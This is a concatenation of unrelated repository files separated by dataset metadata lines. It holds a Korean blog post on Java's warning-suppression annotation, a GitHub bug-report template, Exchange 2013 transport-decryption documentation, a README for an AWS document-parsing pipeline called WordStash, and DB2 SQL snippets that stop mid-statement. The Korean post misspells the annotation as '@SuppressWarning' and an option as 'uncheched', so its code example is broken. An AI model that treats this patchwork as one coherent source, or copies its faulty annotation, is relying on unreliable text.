--- layout: "post" title: "@SuppressWarning" date: "2017-01-29 23:21" categories : java tags : spring annotation --- # @SuppressWarning 컴파일러에서 제공하는 경고 중 제외하고자 할때 사용하는 어노테이션이다. ## Options | Option | Description | |:--:|:--| | all | 모든 경고를 억제 | |cast | 캐스트 연산자 관련 경고 억제 | | dep-ann | 사용하지 말아야 할 주석 관련 경고 억제 | | deprecation | 사용하지 말아야 할 메소드 관련 경고 억제 | | fallthrough | switch 문에서의 break 누락 관련 경고 억제 | | finally | 반환하지 않는 finally 블럭 관련 경고 억제 | |null | null 분석 관련 경고 억제 | | rawtypes | 제네릭을 사용하는 클래스 매개 변수가 불특정일 때의 경고 억제 | |uncheched | 검증되지 않은 연산자 관련 경고 억제 | |unused | 사용하지 않는 코드 관련 경고 억제 | ## 사용 예 ```java @SuppressWarning("unused") ``` > [참고:블로그](http://jinwoonote.tistory.com/entry/SuppressWarnings-%EC%9D%B4%EA%B1%B4-%EB%AD%90%EC%A7%80)
20.722222
102
0.648794
kor_Hang
1.000006
4beab8928b60ae1f07a890c4d52c133ebc8b754e
653
md
Markdown
.github/ISSUE_TEMPLATE/bug_report.md
1v4nx/babel-plugin-transform-compress-graphql
028fde8f510468d8196dc392a258e6a9abd300b4
[ "MIT" ]
5
2019-02-26T00:21:30.000Z
2020-09-25T17:02:15.000Z
.github/ISSUE_TEMPLATE/bug_report.md
1v4nx/babel-plugin-transform-compress-graphql
028fde8f510468d8196dc392a258e6a9abd300b4
[ "MIT" ]
7
2019-02-26T00:21:22.000Z
2020-11-20T19:47:57.000Z
.github/ISSUE_TEMPLATE/bug_report.md
1v4nx/babel-plugin-transform-compress-graphql
028fde8f510468d8196dc392a258e6a9abd300b4
[ "MIT" ]
1
2020-11-10T19:37:04.000Z
2020-11-10T19:37:04.000Z
--- name: Bug report about: Create a report to help improve this plugin title: '' labels: '' assignees: frontendr --- **Describe the bug** A clear and concise description of what the bug is. **Input** How to reproduce the behavior: - The input code that's causing the bug. - Try to keep the test case as minimal as possible. **Output** What was the incorrect output? **Expected output** What was the output you're expecting? What should be different? **Versions (please complete the following information):** - Babel version - GraphQL version - Plugin version **Additional context** Add any other context about the problem here if applicable.
21.064516
63
0.739663
eng_Latn
0.997635
4beb0cfee9f87305593f78e038cbf49704a6ed3c
10,223
md
Markdown
Exchange/ExchangeServer2013/transport-decryption-exchange-2013-help.md
trevordueck/OfficeDocs-Exchange
b0b0360b2b49cd5bba4a11926e727f25b0d5108b
[ "CC-BY-4.0", "MIT" ]
1
2019-12-03T09:05:38.000Z
2019-12-03T09:05:38.000Z
Exchange/ExchangeServer2013/transport-decryption-exchange-2013-help.md
trevordueck/OfficeDocs-Exchange
b0b0360b2b49cd5bba4a11926e727f25b0d5108b
[ "CC-BY-4.0", "MIT" ]
null
null
null
Exchange/ExchangeServer2013/transport-decryption-exchange-2013-help.md
trevordueck/OfficeDocs-Exchange
b0b0360b2b49cd5bba4a11926e727f25b0d5108b
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'Transport decryption: Exchange 2013 Help' TOCTitle: Transport decryption ms:assetid: 4267c46d-f488-404d-a5cb-51f9127461c0 ms:mtpsurl: https://technet.microsoft.com/library/Dd638122(v=EXCHG.150) ms:contentKeyID: 49319908 ms.date: 05/13/2016 ms.reviewer: manager: serdars ms.author: v-mapenn author: mattpennathe3rd mtps_version: v=EXCHG.150 --- # Transport decryption _**Applies to:** Exchange Server 2013_ In Microsoft Exchange Server 2013, Microsoft Outlook 2010 and later, and Microsoft Office Outlook Web App, users can use Information Rights Management (IRM) to protect their messages. You can create Outlook protection rules to automatically apply IRM protection to messages before they're sent from an Outlook 2010 client. You can also create transport protection rules to apply IRM protection to messages in transit that match the rule conditions. Transport decryption allows access to IRM-protected messaging content to enforce messaging policies. For management tasks related to managing IRM, see [Information Rights Management procedures](information-rights-management-procedures-exchange-2013-help.md). ## Limitations of other encryption solutions If it's critical that your organization protects sensitive information, including high business impact (HBI) information and personally identifiable information (PII), consider encrypting e-mail messages and attachments. E-mail encryption solutions such as S/MIME have been available for a long time. These encryption solutions have seen varying degrees of adoption in organizations of different types. However, such solutions present the following challenges: - **Inability to apply messaging policies**: Organizations also face compliance requirements that require inspection of messaging content to make sure it adheres to messaging policies. However, messages encrypted with most client-based encryption solutions, including S/MIME, prevent content inspection on the server. Without content inspection, an organization can't validate that all messages sent or received by its users comply with messaging policies. For example, to comply with a legal regulation, you've configured a transport rule to detect PII, such as a social security number, and automatically apply a disclaimer to the message. If the message is encrypted, the Transport Rules agent on the Transport service can't access message content, and therefore won't apply the disclaimer. This results in a violation of the policy. - **Decreased security**: Antivirus software is unable to scan encrypted message content, further exposing an organization to risk from malicious content such as viruses and worms. Encrypted messages are generally considered to be trusted by most users, thereby increasing the likelihood of a virus spreading throughout your organization. For example, you've configured an Outlook protection rule to automatically apply IRM protection to all messages sent to the All Employees distribution list with the Company Confidential rights management service (RMS) template. A user's workstation is infected with a virus that propagates by automatically using Reply All to reply to messages. If the message carrying the virus is encrypted, the antivirus scanner can't scan the message. - **Impact to custom transport agents**: Many organizations develop custom transport agents for different purposes, such as meeting additional processing requirements for compliance, security, or custom message routing. Custom transport agents developed by an organization to inspect or modify messages are unable to process encrypted messages. If the custom transport agents developed by your organization can't access message content, message encryption may prevent your organization from meeting the goals for which the custom transport agents are developed. ## Using transport decryption for encrypted content In Exchange 2013, IRM features address these challenges. If messages are IRM-protected, transport decryption allows you to decrypt them in transit. IRM-protected messages are decrypted by the Decryption agent, a compliance-focused transport agent. > [!NOTE] > In Exchange 2013, the Decryption agent is a built-in agent. Built-in agents aren't included in the list of agents returned by the <STRONG>Get-TransportAgent</STRONG> cmdlet. For more details, see <A href="transport-agents-exchange-2013-help.md">Transport agents</A>. The Decryption agent decrypts the following types of IRM-protected messages: - Messages IRM-protected by the user in Outlook Web App. - Messages IRM-protected by the user in Outlook 2010. - Messages IRM-protected automatically by Outlook protection rules in Exchange 2013 and Outlook 2010. > [!IMPORTANT] > Only messages IRM-protected by the AD&nbsp;RMS server in your organization are decrypted by the Decryption agent. > [!NOTE] > Messages protected in-transit using transport protection rules aren't required to be decrypted by the Decryption agent. The Decryption agent fires on the <STRONG>OnEndOfData</STRONG> and <STRONG>OnSubmit</STRONG> transport events. Transport protection rules are applied by the Transport Rules agent, which fires on the <STRONG>OnRoutedMessage</STRONG> event, and IRM-protection is applied by the Encryption agent on the <STRONG>OnRoutedMessage</STRONG> event. For more information about transport agents and a list of SMTP events on which they can be registered, see <A href="transport-agents-exchange-2013-help.md">Transport agents</A>. Transport decryption is performed on the first Exchange 2013 Transport service that handles a message in an Active Directory forest. If a message is transferred to a Transport service in another Active Directory forest, the message is decrypted again. After decryption, unencrypted content is available to other transport agents on that server. For example, the Transport Rules agent on a Transport service can inspect message content and apply transport rules. Any actions specified in the rule, such as applying a disclaimer or modifying the message in any other way, can be taken on the unencrypted message. Third-party transport agents, such as antivirus scanners, can scan the message for viruses and malware. After other transport agents have inspected the message and possibly made modifications to it, it's encrypted again with the same user rights that it had before being decrypted by the Decryption agent. The same message isn't decrypted again by other the Transport service on other Mailbox servers in the organization. Messages decrypted by the Decryption agent don't leave the Transport service without being encrypted again. If a transient error is returned when decrypting or encrypting the message, the Transport service retries the operation twice. After the third failure, the error is treated as a permanent error. If any permanent errors occur, including when transient errors are treated as permanent errors after retries, the Transport service treats them as follows: - If the permanent error occurs during decryption, a non-delivery report (NDR) is sent only if transport decryption is set to `Mandatory`, and the encrypted message is sent with the NDR. For more details about the configuration options available for transport decryption, see Configuring Transport Decryption later in this topic. - If the permanent error occurs during re-encryption, an NDR is always sent without the decrypted message. > [!IMPORTANT] > Any custom or third-party agents installed on a Transport service have access to the decrypted message. You must consider the behavior of such transport agents. We recommend that you test all custom and third-party transport agents thoroughly before you deploy them in a production environment.<BR>After a message is decrypted by the Decryption agent, if a transport agent creates a new message and embeds (attaches) the original message to the new one, only the new message is protected. The original message, which becomes an attachment to the new message, doesn't get re-encrypted. A recipient receiving such a message can open the attached message and take actions such as forwarding or replying, which would bypass rights enforcement. ## Configuring transport decryption Transport decryption is configured by using the [Set-IRMConfiguration](https://technet.microsoft.com/library/dd979792\(v=exchg.150\)) cmdlet in the Exchange Management Shell. However, before you configure transport decryption, you must provide Exchange 2013 servers the right to decrypt content protected by your AD RMS server. This is done by adding the Federation mailbox to the super users group configured on the AD RMS cluster in your organization. > [!IMPORTANT] > In cross-forest AD&nbsp;RMS deployments where you have an AD&nbsp;RMS cluster deployed in each forest, you must add the Federation mailbox to the super users group on the AD&nbsp;RMS cluster in each forest to allow the Transport service on an Exchange 2013 Mailbox server or an Exchange 2010 Hub Transport server to decrypt the messages protected against each AD&nbsp;RMS cluster. For details, see [Add the Federation Mailbox to the AD RMS Super Users Group](add-the-federation-mailbox-to-the-ad-rms-super-users-group-exchange-2013-help.md). Exchange 2013 allows two different settings when enabling transport decryption: - **Mandatory**: When transport decryption is set to `Mandatory`, the Decryption agent rejects the message and returns an NDR to the sender if a permanent error is returned when decrypting a message. If your organization doesn't want a message to be delivered if it can't be successfully decrypted and actions such as antivirus scanning and transport rules are applied, you must choose this setting. - **Optional**: When transport decryption is set to Optional, the Decryption agent uses a best-effort approach. Messages that can be decrypted are decrypted, but messages with a permanent error on decryption are also delivered. If your organization prioritizes message delivery over messaging policy, you must use this setting. For more information about configuring transport decryption, see [Enable or Disable Transport Decryption](enable-or-disable-transport-decryption-exchange-2013-help.md).
126.209877
1,032
0.814145
eng_Latn
0.997773
4beb101226d9fb5b7a52e0e44e27864408852ed6
23,789
md
Markdown
README.md
corticai/word-stash
bd42779ebbd62e2cd4aa2a96d670ab11367bf39e
[ "MIT" ]
1
2022-02-11T07:17:26.000Z
2022-02-11T07:17:26.000Z
README.md
corticai/word-stash
bd42779ebbd62e2cd4aa2a96d670ab11367bf39e
[ "MIT" ]
null
null
null
README.md
corticai/word-stash
bd42779ebbd62e2cd4aa2a96d670ab11367bf39e
[ "MIT" ]
null
null
null
# WordStash ![Technical Architecture](./docs/images/word-stash-tech-arch.png) ## Project Description ### What Does It Do WordStash is a platform that automatically extracts text from documents and stores it in a searchable format. It transforms documents into data that can be used for machine learning purposes. The transformation process occurs in 4 stages - [Document Parsing](#document-parsing), [Payload Publishing](#payload-publishing), [Payload Conversion](#payload-conversion) and [Data Storage](#data-storage). #### Document Parsing Textual documents are ingested, and chunked json payload representations of the documents are created during the Document Parsing stage. The system is able to parse the following file formats: - CSV files - Word documents (docx) - Emails (eml) and attachments that fall in the allowed file formats - PDFs - Text files (txt) - Excel spreadsheets (excel) #### Payload Publishing The parsed payload representations are published as notifications to downstream systems. #### Payload Conversion The payload representations are transformed into one of the following machine learning formats: - [Text classification](https://developers.google.com/machine-learning/guides/text-classification) - [Extractive question answering (SQuAD)](https://rajpurkar.github.io/SQuAD-explorer/) - Part of Speech tagging formats: - [BILUO](https://towardsdatascience.com/extend-named-entity-recogniser-ner-to-label-new-entities-with-spacy-339ee5979044) - [Named Entity Recognition](https://cs230.stanford.edu/blog/namedentity/) #### Data Storage The payloads are stored into a search engine database. ## Table of Contents 1. [Prerequisites](#prerequisites) 1. [Project Repository Folder Structure](#project-repository-folder-structure) 1. [Instructions to Test the Code Locally](#instructions-to-test-the-code-locally) 1. [Deploying the Code from a Local Workstation](#deploying-the-code-from-a-local-workstation) 1. [Deploying the Code using Github Actions](#deploying-the-code-using-github-actions) 1. [Instructions to Use WordStash](#instructions-to-use-wordstash) 1. [Technical Architecture](#technical-architecture) 1. [JSON Payload Formats](#json-payload-formats) 1. [Technologies](#technologies) 1. [Furture Work](#future-work) ## Prerequisites The following is required to deploy WordStash: 1. [AWS account](https://aws.amazon.com/premiumsupport/knowledge-center/create-and-activate-aws-account/) 1. [Github account](https://github.com/join) 1. [Docker 19.03 or above - Download Docker](https://www.docker.com/products/docker-desktop) 1. [Docker Compose 1.27 or above - (Note that Docker for MacOS comes with Docker Compose)](https://docs.docker.com/compose/) 1. [GNU Make (which is pre-installed on MacOs and Linux)](https://www.gnu.org/software/make/) 1. [Python 3.8 or above (with Pip)](https://www.python.org/downloads/) 1. [AWS command line interface](https://aws.amazon.com/cli/) ## Project Repository Folder Structure ``` ├── .github │ └── workflows ├── cloudformation ├── config │ └── dev ├── impleter │ ├── converters | │ ├── scripts | │ ├── src | │ └── tests │ ├── parsers │ │ ├── scripts │ │ ├── src │ │ └── tests │ └── publishers │ ├── scripts │ ├── src │ └── tests ├── kibana ├── local-dependencies | ├── lambda-packager │ │ ├── converters │ │ ├── parsers │ │ └── publishers | | | ├── lambda-tester │ │ └── impleter | | | ├── OpenSearch | | | └── tester │ └── impleter └── scripts ``` ## Instructions To Test the Code Locally To run the tests locally, execute the following command in the parent directory: ``` make test ``` ## Deploying the Code from a Local Workstation 1. Create an [AWS account](https://aws.amazon.com/premiumsupport/knowledge-center/create-and-activate-aws-account/) if you do not have an existing account. Otherwise, skip this step. 1. Create an [AWS admin user](https://docs.aws.amazon.com/IAM/latest/UserGuide/getting-started_create-admin-group.html). 1. Generate new [AWS credentials](https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/getting-your-credentials.html) for the user created in the previous step. 1. Ensure that you have [setup your AWS credentials](https://docs.aws.amazon.com/sdk-for-java/v1/developer-guide/setup-credentials.html) on your local workstation prior to deploying the code. 1. To deploy the code, execute the following command in the parent directory: ``` make deploy-local ``` ## Deploying the Code using Github Actions WordStash can be deployed to AWS via [Github actions](https://github.com/features/actions). It does so automatically on a commit and push to the the main branch. Below are the instructions for the AWS and GitHub setup prerequisites. ### AWS Account 1. Create an [AWS account](https://aws.amazon.com/premiumsupport/knowledge-center/create-and-activate-aws-account/) if you do not have an existing account. Otherwise, skip this step. #### IAM User 1. Create a new [AWS user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html) 1. [Create an inline policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-attach-detach.html) for the user. Go to permissions -> Add inline policy -> JSON, and add the below JSON policy to the user: ``` { "Version": "2012-10-17", "Statement": [ { "Action": [ "sts:TagSession", "sts:AssumeRole" ], "Resource": "*", "Effect": "Allow", "Sid": "AllowAssumeCiCdRole" } ] } ``` 1. Click on "Review Policy" followed by "Create Policy". 1. Create new [AWS credentials](https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/getting-your-credentials.html) for the IAM user. Take note of the access key id and secret access key. 1. Take note of the User's ARN. #### IAM Role 1. Create an [AWS account role in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-user.html) with AdminstratorAccess permissions. <img src="./docs/images/aws-role.png" alt="drawing" width="1000" align="center"/> 1. Click on the "Edit" button, and set the Maximum session duration to 2 hours. <img src="./docs/images/aws-role-duration.png" alt="drawing" width="800" align="center"/> 1. Click on "Save Changes". 1. Go to Trust relationships, and [edit the trust policy](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/edit_trust.html) with the below JSON. Enter the AWS user's ARN as per indicated: ``` { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": <YOUR USER ARN HERE> }, "Action": [ "sts:AssumeRole", "sts:TagSession" ] } ] } ``` <img src="./docs/images/aws-role-trust-policy.png" alt="drawing" align="center"/> 1. Click on "Update Policy". 1. Take note of the IAM role name. 1. Set the role-to-assume on .github/workflows/deploy.yml to the IAM role name. <img src="./docs/images/github-actions-iam-assumed-role.png" alt="drawing" width="800" align="center"/> #### AWS Region 1. Set your preferred AWS region in .github/workflows/deploy.yml (configure-aws-creds-dev->with->aws-region) <img src="./docs/images/github-actions-aws-region-step.png" alt="drawing" width="800" align="center"/> ### Github Account 1. Create a [Github account](https://github.com/join) 1. Create a [private fork of the WordStash repo](https://gist.github.com/0xjac/85097472043b697ab57ba1b1c7530274) 1. Using the previously created AWS credentials, generate the following secrets for the forked repo via [Github Action's secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets): Secret Name | Secret Value ----------- | ------------ CORTICAI_DEV_AWS_ACCESS_KEY_ID| AWS access key id CORTICAI_DEV_AWS_SECRET_ACCESS_KEY| AWS secret access key <img src="./docs/images/github-actions-secrets.png" alt="drawing" width="800" align="center"/> ## Instructions to Use WordStash Upload files that are [compatible](#document-parsing) with WordStash to the word-stash-source-document-bucket S3 bucket. Below is an AWS command line interface example: ``` aws s3 cp impleter/parsers/tests/data/example.csv s3://word-stash-source-document-bucket ``` The transformed document should be transformed and stored in the word-stash-db-{ENVIRONMENT} OpenSearch service. Follow the instructions in this [link](https://aws.amazon.com/premiumsupport/knowledge-center/OpenSearch-outside-vpc-ssh/) to access OpenSearch via Kibana. ## Technical Architecture ![Technical Architecture](./docs/images/word-stash-tech-arch.png) The end to end WordStash workflow is as follows: 1. File upload to S3 word-stash-source-document-bucket bucket. Files that are [compatible](#document-parsing) with WordStash generate an S3 event trigger. 1. File parser lambda functions are triggered by these S3 event triggers. They split and transform the documents into json payload representations of the document. The json payloads are stored in the S3 word-stash-destination-document-bucket bucket. The code can be found in the ./word-stash/impleter/parsers/src directory: - csv_dict_lambda_function.py - CSV files - docx_dict_lambda_function.py - Word documents (docx) - email_dict_lambda_function.py - Emails (eml) and attachments that fall in the allowed file formats - ner_label_dict_lambda_function.py - BILUO annotated Named Entity Recognition (NER) parser. - pdf_dict_lambda_function.py - PDFs - squad_label_dict_lambda_function.py - SQuAD annotated extractive question-answer parser. - txt_dict_lambda_function.py - Text files (txt) - xlsx_dict_lambda_function.py - Excel spreadsheets (excel) 1. Eventbridge triggers Publisher lambda functions when files are stored in the S3 word-stash-destination-document-bucket bucket. 1. The Publisher lambda functions send the json payloads to the respective Kinesis Firehose delivery streams. (publisher code can be found at ./word-stash/impleter/publishers/src): - eb_s3_firehose_crude_json_lambda_function.py - lambda function that published to the Crude Firehose delivery stream. - eb_s3_firehose_ner_label_json_lambda_function.py - lambda function that published to the annotated NER BILUO Firehose delivery stream. - eb_s3_firehose_squad_label_json_lambda_function.py - lambda function that published to the annotated SQuAD Firehose delivery stream. 1. The Kinesis Firehose delivery streams store the json payloads into the OpenSearch search engine. The payloads are converted by lambda functions prior to being saved (code can be found in the ./word-stash/impleter/converters/src directory) - class_crude_to_label_lambda_function.py - converts a Crude json payload to a text classification format. - ner_crude_to_label_lambda_function.py - converts a Crude json payload to a NER BILUO format. - ner_label_to_train_lambda_function.py - converts a NER BILUO json payload to a Huggingface Transformer NER format. - squad_crude_to_label_lambda_function.py - converts a Crude json payload to a SQuAD annotated extractive question-answer format. - squad_label_to_train_lambda_function.py - converts a SQuAD annotated extractive question-answer payload to a Huggingface Transformer SQuAD format. 1. The payloads are stored in the following OpenSearch indices: - crude - converted [Crude json payloads](#crude-payload) from all Kinesis delivery streams. - class_crude_label - [Text classification](#text-classification-payload) json payloads. - ner_crude_label - [NER BILUO](#ner-biluo-payload) json payloads. - ner_label_train - [Huggingface Transformer NER](#huggingface-transformer-ner-payload) json payloads. - squad_crude_label - [SQuAD annotated extractive question-answer](#squad-annotated-exractive-question-answer-payload) json payloads. - squad_label_train - [Huggingface Transformer SQuAD](#huggingface-transformer-squad-payload) json payloads. ## JSON Payload Formats ### Crude Payload The Crude payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "content": { "type": ["string", "null"] }, "content2": { "type": ["string", "null"] } }, "required": ["index", "id", "content"] } ``` An example payload: ``` { "data": [ { "timestamp": "2022-02-03T09:48:09.041402", "filetype": "txt", "index": 0, "id": "6e78737f-067b-490e-ba08-efaf53138871-20220203_174809", "content": "Nam dignissim ac nisi eu pellentesque. Aliquam viverra felis et purus pharetra, et vestibulum turpis porta. Pellentesque tellus turpis, cursus id eros at, congue malesuada eros. Maecenas neque magna, dictum ac fringilla eu, mattis in metus. Curabitur aliquet nibh nulla, et ultricies nibh aliquam ac. Sed eget elit suscipit, luctus libero at, faucibus leo. Vestibulum et eros nec urna viverra pretium sit amet vitae justo.\n\nCurabitur pellentesque mauris nec ornare aliquam. Maecenas porttitor varius risus eu convallis. Phasellus ipsum metus, condimentum pretium ullamcorper ac, maximus non velit. Phasellus a nisl sit amet augue molestie bibendum. Cras arcu lorem, pulvinar nec neque" } ] } ``` ### Text Classification Payload The Text classification payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "content": { "type": ["string", "null"] }, "content2": { "type": ["string", "null"] }, "label": { "type": ["string", "null"] } }, "required": ["index", "id", "content"] } ``` An example payload: ``` { "timestamp": "2022-02-03T09:48:09.041402", "filetype": "txt", "index": 0, "id": "6e78737f-067b-490e-ba08-efaf53138871-20220203_174809", "content": "Nam dignissim ac nisi eu pellentesque. Aliquam viverra felis et purus pharetra, et vestibulum turpis porta. Pellentesque tellus turpis, cursus id eros at, congue malesuada eros. Maecenas neque magna, dictum ac fringilla eu, mattis in metus. Curabitur aliquet nibh nulla, et ultricies nibh aliquam ac. Sed eget elit suscipit, luctus libero at, faucibus leo. Vestibulum et eros nec urna viverra pretium sit amet vitae justo.\n\nCurabitur pellentesque mauris nec ornare aliquam. Maecenas porttitor varius risus eu convallis. Phasellus ipsum metus, condimentum pretium ullamcorper ac, maximus non velit. Phasellus a nisl sit amet augue molestie bibendum. Cras arcu lorem, pulvinar nec neque", "label": "neutral_sentiment" } ``` ### NER BILUO Payload The NER BILUO payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "text": { "type": "string" }, "label": { "type": "array", "items": { "type": "array", "prefixItems": [ { "type": ["integer", "string"] }, { "type": ["integer", "string"] }, { "type": "string" } ] } } }, "required": ["index", "id", "text", "label"] } ``` An example payload: ``` { "index": 0, "id": "DEV-865", "text": "API: generate password is required", "label": [[5, 21, "SYSTEM-ADMINISTRATION"]] } ``` ### Huggingface Transformer NER Payload The Huggingface Transformer NER payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "text": { "type": "array", "items": { "type": "string" } }, "label": { "type": "array", "items": { "type": "string" } } }, "required": ["index", "id", "text", "label"] } ``` An example payload: ``` { "index": 0, "id": "DEV-865", "text": ["The", "field", "of", "machine", "learning", "has", "made", "tremendous", "progress", "over", "the", "past", "decade"], "label": ['O', 'U-LOC', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O'] } ``` ### SQuAD Annotated Exractive Question Answer Payload The SQuAD annotated extractive question-answer payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "context": { "type": "string" }, "qas": { "type": "array", "items": { "type": "object", "properties": { "question": { "type": "string" }, "answers": { "type": "array", "items": { "type": "object", "properties": { "answer_start": { "type": "integer" }, "text": { "type": ["string", "null"] } } } } } } } }, "required": ["index", "id", "context", "qas"] } ``` An example payload: ``` { "id": "623ddfda-851b-4a8c-acb7-e5598558ff2f", "index": 0, "context": "The field of machine learning has made tremendous progress over the past decade.", "qas": [ { "question": "What has made progress?", "id": "aae57aac-8246-48e5-ba01-f58185edaca4", "answers": [ { "answer_start": 4, "text": "field of machine learning" } ] } ] } ``` ### Huggingface Transformer SQuAD Payload The Huggingface Transformer SQuAD payload has the following schema properties: ``` { "type": "object", "properties": { "filename": { "type": ["string", "null"] }, "filetype": { "type": ["string", "null"] }, "index": { "type": "integer" }, "id": { "type": "string" }, "context": { "type": "string" }, "question": { "type": "string" }, "answers": { "type": "object", "properties": { "answer_start": { "type": "array", "items": { "type": "integer" } }, "text": { "type": "array", "items": { "type": ["string", "null"] } } } } }, "required": ["index", "id", "context", "question", "answers"] } ``` An example payload: ``` { "id": "57639482-160721-1931_f846bbc6-b4ae-437d-bd90-4df09285d2bb-20220204_142245_0", "title": "Machine Learning Progress", "context": "The field of machine learning has made tremendous progress over the past decade", "question": "What has made progress?", "answers": { "answer_start": [4], "text": ["field of machine learning"] } } ``` ## Technologies The WordStash technologies: - Simple Storage Service (S3) - AWS Lambda - Event Bridge - Kinesis Firehose - OpenSearch ### Simple Storage Service (S3) WordStash stores and persists transit data on S3 in the interim as it is parsed, converted, and stored into the platforms final search engine database destination. We have decided on S3 to store the transient data as it is low cost, claims 99.99% availability and secure. ### AWS Lambda The WordStash core features of parsing, converting and storing textual documents are written in python. The pipeline is event driven. Execution parallelability is paramount so as to fully take advantage of AWS scalable services like Kinesis and OpenSearch. AWS Lambda was chosen as a framework to implement these core features as it supports most coding languages out of the box. It has a pay as you use pricing model, doesn't require infrastructure to manage, and can be run and tested locally. The service is also highly scalable and has the ability to seamlessly integrate with other AWS native services. ### Event Bridge One of WordStash's requirement is for an asynchronous, event driven messaging system so that documents can be processed in parallel at scale. Event Bridge was selected to fulfil the requirement as: - It has a loose-coupled architecture. - The components involved can be isolated. - It makes it easy to extend or replace services. - It enables a zero-waste architecture. - The schema registry makes it very easy to manage large scale applications. - There is a vast number of options in terms of integration with both native and third party services/APIs. ### Kinesis Firehose The system had to have the functionality to stream data (i.e. converted json payloads) to different destination databases or data stores. Kinesis Firehose is the applied service as: - It can work on streaming data as it streams. - It provides real time insights. - It is serverless and has a pay as you go pricing model. - Its highly scalable. - There is no need to learn new languages, frameworks, or machine learning algorithms. - There is a vast number of options in terms of integration with both native and third party data stores. ### OpenSearch The documents are stored on OpenSearch as: - It is built to scale. - It has fast performance as it uses distributed inverted indices, to quickly find the best matches for full-text searches on very large data sets. - It is multilingual. - It is document oriented (JSON). - It is schema free. ## Future Work Some food for thought: - Compatibility with other file formats. - Implement a multi-tenanted architecture.
39.320661
705
0.62697
eng_Latn
0.82858
4beb58350976aa25ba0c6ab3df2ae323041d71be
3,915
md
Markdown
applications/diem-help/docs/utilities/postgresql.md
raunabit/diem
6acdb08633c2c85593108ea1a262ffd6a05749c2
[ "Apache-2.0" ]
10
2021-03-03T22:28:32.000Z
2022-01-26T20:57:50.000Z
applications/diem-help/docs/utilities/postgresql.md
raunabit/diem
6acdb08633c2c85593108ea1a262ffd6a05749c2
[ "Apache-2.0" ]
31
2021-03-05T09:17:30.000Z
2022-02-15T07:44:20.000Z
applications/diem-help/docs/utilities/postgresql.md
raunabit/diem
6acdb08633c2c85593108ea1a262ffd6a05749c2
[ "Apache-2.0" ]
3
2021-09-10T21:55:35.000Z
2022-01-19T07:08:23.000Z
# SQL Utilities ## Tables Listing tables ```sql SELECT NAME,TYPE, COLCOUNT,REMARKS FROM SYSIBM.SYSTABLES WHERE CREATOR in ('ES') ORDER BY NAME,TYPE ``` For Use in MD format ```sql SELECT NAME, '|',TYPE, '|',COLCOUNT, '|',REMARKS FROM SYSIBM.SYSTABLES WHERE CREATOR in ('ES') ORDER BY NAME,TYPE ``` If you want to add a comment on a table ```sql COMMENT ON TABLE ES.ESW#REQ IS 'Main Request Table' ``` Make a list for adding comment by using a query ```sql SELECT 'COMMENT ON TABLE '||trim(CREATOR)||'.'||NAME||' IS ' || CASE WHEN REMARKS IS NULL THEN ''''';' ELSE '''' || REMARKS || ''';' END FROM SYSIBM.SYSTABLES WHERE CREATOR in ('ES') ORDER BY NAME,TYPE ``` ## Columns If you want to display the tables columns ```sql SELECT NAME, COLTYPE, LENGTH, NULLS, KEYSEQ, REMARKS FROM SYSIBM.SYSCOLUMNS WHERE TBCREATOR='ES' AND TBNAME = 'ESW#REQ' ORDER BY COLNO; ``` If you want to display the tables columns for markdown ```sql SELECT NAME, '|', COLTYPE, '|', LENGTH, '|', NULLS, '|', KEYSEQ, '|', REMARKS FROM SYSIBM.SYSCOLUMNS WHERE TBCREATOR='ES' AND TBNAME = 'ESW#CMR_SAP' ORDER BY COLNO; ``` If you want to add a comment on the field ```esw COMMENT ON COLUMN ES.ESW#REQ.ID IS 'UNIQUE ID' ; ``` Make a list for adding comment by using a query ```sql SELECT 'COMMENT ON COLUMN '||trim(TBCREATOR)||'.'||TBNAME||'.'|| NAME ||' IS '''';' FROM SYSIBM.SYSCOLUMNS WHERE TBCREATOR='ES' AND TBNAME = 'ESW#REQ' AND REMARKS IS null ORDER BY COLNO; ``` ## Other Commands ### Foreign relationships Get a list of foreing relationships ```sql select substr(tabname,1,20) table_name,substr(constname,1,20) fk_name,substr(REFTABNAME,1,12) parent_table,substr(refkeyname,1,20) pk_orig_table,fk_colnames from syscat.references where tabname = ``` ### Cross References ```sql select substr(tabname,1,20) table_name,substr(constname,1,20) fk_name,substr(REFTABNAME,1,12) parent_table,substr(refkeyname,1,20) pk_orig_table,fk_colnames from syscat.references where tabname = ``` ### Reorg Statement !!! failure "*SQL Error [57016]: Operation not allowed for reason code '7'*" ```sql CALL SYSPROC.ADMIN_CMD('reorg table es.esw#act_info') ``` ### Tables in Pending state ```sql select TABSCHEMA, TABNAME from SYSIBMADM.ADMINTABINFO where REORG_PENDING = 'Y' ``` ### Integrity !!! failure "SQL0668N Operation not allowed for reason code "1" on table 'TSMDB1.AAA'" ```sql set integrity for ES.ESW#REQ_M immediate checked not incremental ``` ### Null Values !!! failure "SSQL0407N Assignment of a NULL value to a NOT NULL column 'TBSPACEID=2,TABLEID=10, COLNO=11' is not allowed" ```sql SELECT tabschema, tabname, colname FROM syscat.columns WHERE colno = 2 AND ( tabschema, tabname ) IN ( SELECT tabschema, tabname FROM syscat.tables WHERE tbspaceid = 2 AND tableid = 3611 ) ``` ### Constraints set a constraint ```sql ALTER TABLE EMPLOYEE ADD CONSTRAINT 